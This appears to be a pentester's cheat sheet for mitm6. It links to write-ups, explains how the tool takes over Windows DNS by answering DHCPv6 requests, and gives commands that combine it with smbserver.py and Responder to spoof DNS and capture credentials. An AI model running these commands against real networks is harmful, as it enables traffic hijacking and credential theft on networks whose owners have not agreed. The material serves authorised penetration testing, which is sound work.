# Resources
https://github.com/fox-it/mitm6
https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
https://systemadminspro.com/domain-attacks-getting-an-account/
https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
https://blog.vonahi.io/taking-over-ipv6-networks/
https://intrinium.com/mitm6-pen-testing/
# mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server.# It does this by replying to DHCPv6 messages, providing victims with a link-local# IPv6 address and setting the attackers host as default DNS server# When using mitm6, it issues a DHCPv6 lease to clients that last for a period of 300 seconds (or 5 minutes)# Due to this, it's possible that several DNS queries will actually fail, resulting in clients# not being able to access services that rely on DNS names.# You can, however, change this in the source code.# Gonna create a fake DNS server for targets
$ sudo mitm6 -d lab.local
Using with SMB server
# First shell
$ sudo mitm6 -i eth0
# Second shell
$ smbserver.py SHARE_NAME path/to/share
Using with Responder
# First shell
$ sudo mitm6 -i eth0
# Second shell
$ responder -I eth0 -wFv